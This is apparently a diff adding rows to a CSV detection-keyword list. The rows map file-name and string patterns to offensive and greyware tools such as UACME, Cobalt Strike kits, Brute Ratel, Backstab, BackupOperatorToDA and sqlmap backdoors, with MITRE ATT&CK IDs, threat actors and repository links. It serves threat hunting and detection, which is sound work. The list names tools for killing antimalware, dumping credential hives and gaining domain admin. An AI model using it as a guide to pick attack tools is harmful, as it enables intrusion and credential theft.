+"*b774446d2f110ce954fb0a710f4693c5562ddbd8d56fe84106f2ee80db8b50a2*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z"
+"*b7dec074f463b0be08dd3a707495e45c7a629502fa6dd7ef972a74a2aff72632*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z"
+"*ba8fe35020bcd560c0f100bda43c2311bfdbb97aafbe367ac5077cebca59287f*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z"
+"*babelstrike.py -*","offensive_tool_keyword","BabelStrike","The purpose of this tool is to normalize and generate possible usernames out of a full names list that may include names written in multiple (non-English) languages. common problem occurring from scraped employee names lists (e.g. 
from Linkedin)","T1078 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/t3l3machus/BabelStrike","1","0","N/A","1","1","38","13","2023-09-12T13:49:30Z","2023-01-10T07:59:00Z" +"*BabelStrike-main*","offensive_tool_keyword","BabelStrike","The purpose of this tool is to normalize and generate possible usernames out of a full names list that may include names written in multiple (non-English) languages. common problem occurring from scraped employee names lists (e.g. from Linkedin)","T1078 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/t3l3machus/BabelStrike","1","1","N/A","1","1","38","13","2023-09-12T13:49:30Z","2023-01-10T07:59:00Z" +"*Backdoor LNK*","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Persistence","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/0xthirteen/StayKit","1","0","N/A","10","10","449","81","2020-01-27T14:53:31Z","2020-01-24T22:20:20Z" +"*Backdoor.*","offensive_tool_keyword","backdoor keyword","keyword observed in multiple backdoor 
tools","T1037.001 - T1037.002 - T1003.001 - T1001.002 - T1055.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Exploitation tools","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*backdoor.asp*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","1","N/A","N/A","10","28287","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" +"*Backdoor.ASP.FUZZSHELL.A*","signature_keyword","Antivirus Signature","Antiviurs signature_keyword","N/A","N/A","N/A","N/A","Exploitation tools","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*Backdoor.ASP.WEBSHELL.*","signature_keyword","Antivirus Signature","Antiviurs signature_keyword","N/A","N/A","N/A","N/A","Exploitation tools","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*backdoor.aspx*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","1","N/A","N/A","10","28287","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" +"*backdoor.jsp*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","1","N/A","N/A","10","28287","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" +"*backdoor.php*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","1","N/A","N/A","10","28287","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" +"*Backdoor.PHP.WebShell.*","signature_keyword","Antivirus Signature","Antiviurs 
signature_keyword","N/A","N/A","N/A","N/A","Exploitation tools","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*Backdoor/Win.*","signature_keyword","Antivirus Signature","Antiviurs signature_keyword","N/A","N/A","N/A","N/A","Malware","N/A","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*Backdoor:JS/*","signature_keyword","Antivirus Signature","AV signature for exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","N/A","1","0","backdoor signatures","N/A","N/A","N/A","N/A","N/A","N/A" +"*Backdoor:Linux*","signature_keyword","Antivirus Signature","AV signature for exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","N/A","1","0","backdoor signatures","N/A","N/A","N/A","N/A","N/A","N/A" +"*Backdoor:Python*","signature_keyword","Antivirus Signature","AV signature for exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","N/A","1","0","backdoor signatures","N/A","N/A","N/A","N/A","N/A","N/A" +"*Backdoor:VBS/*","signature_keyword","Antivirus Signature","AV signature for exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","N/A","1","0","backdoor signatures","N/A","N/A","N/A","N/A","N/A","N/A" +"*Backdoor:Win32*","signature_keyword","Antivirus Signature","AV signature for exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","N/A","1","0","backdoor signatures","N/A","N/A","N/A","N/A","N/A","N/A" +"*Backdoor:Win64*","signature_keyword","Antivirus Signature","AV signature for exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","N/A","1","0","backdoor signatures","10","10","N/A","N/A","N/A","N/A" +"*BackdoorableScript*","offensive_tool_keyword","boko","boko.py is an application scanner for macOS that searches for and identifies potential dylib hijacking and weak dylib vulnerabilities for application executables as well as scripts an application may use that have the potential to be backdoored","T1195 - T1078 - T1079 - T1574","TA0006 - TA0008","N/A","N/A","Exploitation 
tools","https://github.com/bashexplode/boko","1","1","N/A","N/A","1","59","12","2021-09-28T22:36:01Z","2020-05-22T21:46:33Z" +"*--backdoor-all*","offensive_tool_keyword","cobaltstrike","Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas","1","0","N/A","10","10","594","117","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z" +"*BackdoorLNK*","offensive_tool_keyword","StayKit","StayKit - Cobalt Strike persistence kit - StayKit is an extension for Cobalt Strike persistence by leveraging the execute_assembly function with the SharpStay .NET assembly. 
The aggressor script handles payload creation by reading the template files for a specific execution type.","T1059 - T1053 - T1124","TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/0xthirteen/StayKit","1","1","N/A","N/A","10","449","81","2020-01-27T14:53:31Z","2020-01-24T22:20:20Z" +"*backdoorlnkdialog*","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Persistence","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/0xthirteen/StayKit","1","1","N/A","10","10","449","81","2020-01-27T14:53:31Z","2020-01-24T22:20:20Z" +"*backstab.exe*","offensive_tool_keyword","Backstab","A tool to kill antimalware protected processes","T1107 - T1106 - T1543.004 ","TA0002 - TA0004 ","N/A","N/A","Defense Evasion","https://github.com/Yaxser/Backstab","1","1","N/A","N/A","10","1237","216","2021-06-19T20:01:52Z","2021-06-15T16:02:11Z" +"*Backstab.sln*","offensive_tool_keyword","Backstab","A tool to kill antimalware protected processes","T1107 - T1106 - T1543.004 ","TA0002 - TA0004 ","N/A","N/A","Defense 
Evasion","https://github.com/Yaxser/Backstab","1","1","N/A","N/A","10","1237","216","2021-06-19T20:01:52Z","2021-06-15T16:02:11Z" +"*backstab.x64.*","offensive_tool_keyword","cobaltstrike","BOF combination of KillDefender and Backstab","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Octoberfest7/KDStab","1","1","N/A","10","10","146","35","2023-03-23T02:22:50Z","2022-03-10T06:09:52Z" +"*backstab.x86.*","offensive_tool_keyword","cobaltstrike","BOF combination of KillDefender and Backstab","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - 
T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Octoberfest7/KDStab","1","1","N/A","10","10","146","35","2023-03-23T02:22:50Z","2022-03-10T06:09:52Z" +"*Backstab/Driverloading*","offensive_tool_keyword","Backstab","A tool to kill antimalware protected processes","T1107 - T1106 - T1543.004 ","TA0002 - TA0004 ","N/A","N/A","Defense Evasion","https://github.com/Yaxser/Backstab","1","1","N/A","N/A","10","1237","216","2021-06-19T20:01:52Z","2021-06-15T16:02:11Z" +"*Backstab-master*","offensive_tool_keyword","Backstab","A tool to kill antimalware protected processes","T1107 - T1106 - T1543.004 ","TA0002 - TA0004 ","N/A","N/A","Defense Evasion","https://github.com/Yaxser/Backstab","1","1","N/A","N/A","10","1237","216","2021-06-19T20:01:52Z","2021-06-15T16:02:11Z" +"*BackupOperatorToDA.cpp*","offensive_tool_keyword","BackupOperatorToDA","From an account member of the group Backup Operators to Domain Admin without RDP or WinRM on the Domain Controller","T1078 - T1078.003 - T1021 - T1021.006 - T1112 - T1003.003","TA0005 - TA0001 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/mpgn/BackupOperatorToDA","1","1","N/A","10","4","335","48","2022-10-05T07:29:46Z","2022-02-15T20:51:46Z" +"*BackupOperatorToDA.exe*","offensive_tool_keyword","BackupOperatorToDA","From an account member of the group Backup Operators to Domain Admin without RDP or WinRM on the Domain Controller","T1078 - T1078.003 - T1021 - T1021.006 - T1112 - T1003.003","TA0005 - TA0001 - TA0003","N/A","N/A","Privilege 
Escalation","https://github.com/mpgn/BackupOperatorToDA","1","1","N/A","10","4","335","48","2022-10-05T07:29:46Z","2022-02-15T20:51:46Z" +"*BackupOperatorToDA.sln*","offensive_tool_keyword","BackupOperatorToDA","From an account member of the group Backup Operators to Domain Admin without RDP or WinRM on the Domain Controller","T1078 - T1078.003 - T1021 - T1021.006 - T1112 - T1003.003","TA0005 - TA0001 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/mpgn/BackupOperatorToDA","1","1","N/A","10","4","335","48","2022-10-05T07:29:46Z","2022-02-15T20:51:46Z" +"*BackupOperatorToDA-master*","offensive_tool_keyword","BackupOperatorToDA","From an account member of the group Backup Operators to Domain Admin without RDP or WinRM on the Domain Controller","T1078 - T1078.003 - T1021 - T1021.006 - T1112 - T1003.003","TA0005 - TA0001 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/mpgn/BackupOperatorToDA","1","1","N/A","10","4","335","48","2022-10-05T07:29:46Z","2022-02-15T20:51:46Z" +"*BackupPrivSAM \\*","offensive_tool_keyword","cobaltstrike","A basic implementation of abusing the SeBackupPrivilege via Remote Registry dumping to dump the remote SAM SECURITY AND SYSTEM hives.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - 
APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/m57/cobaltstrike_bofs","1","0","N/A","10","10","153","25","2022-07-23T20:37:52Z","2020-07-30T22:36:51Z" +"*backupprivsam.*","offensive_tool_keyword","cobaltstrike","A basic implementation of abusing the SeBackupPrivilege via Remote Registry dumping to dump the remote SAM SECURITY AND SYSTEM hives.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/m57/cobaltstrike_bofs","1","1","N/A","10","10","153","25","2022-07-23T20:37:52Z","2020-07-30T22:36:51Z" +"*bad client public DH value*","greyware_tool_keyword","ssh","Detects suspicious SSH / SSHD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts","T1071.004 - T1078.004","TA0011 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/ossec/ossec-hids/blob/master/etc/rules/sshd_rules.xml","1","0","greyware tool 
- risks of False positive !","N/A","10","4103","1020","2023-08-09T15:42:59Z","2013-09-17T17:07:58Z" +"*Bad HTTP verb.*","greyware_tool_keyword","vsftpd","Detects suspicious VSFTPD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts","T1071.004 - T1078.004","TA0011 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/dagwieers/vsftpd/","1","0","greyware tool - risks of False positive !","N/A","1","47","66","2020-11-10T13:07:55Z","2013-06-13T10:11:54Z" +"*badger_exports.h*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*badger_no_acl_1030_objects.log*","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","0","N/A","5","3","252","25","2023-09-21T23:23:07Z","2022-05-10T17:41:53Z" +"*badger_svc.exe*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" 
+"*badger_template.ps1*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*badger_x64.exe*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*badger_x64_*.bin*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*badger_x64_aws.exe*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - 
TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*badger_x64_stealth_rtl.txt*","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","1","N/A","10","1","7","2","2023-09-07T08:36:28Z","2021-12-10T15:04:35Z" +"*BadgerAtoi*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*BadgerDispatch*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*BadgerDispatchW*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - 
T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*BadgerMemcpy*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*BadgerMemset*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*BadgerStrcmp*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*BadgerStrlen*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - 
T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*BadgerWcscmp*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*BadgerWcslen*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*Bad-Pdf*","offensive_tool_keyword","Bad-PDF","Bad-PDF create malicious PDF file to steal NTLM(NTLMv1/NTLMv2) Hashes from windows machines. it utilize vulnerability disclosed by checkpoint team to create the malicious PDF file. 
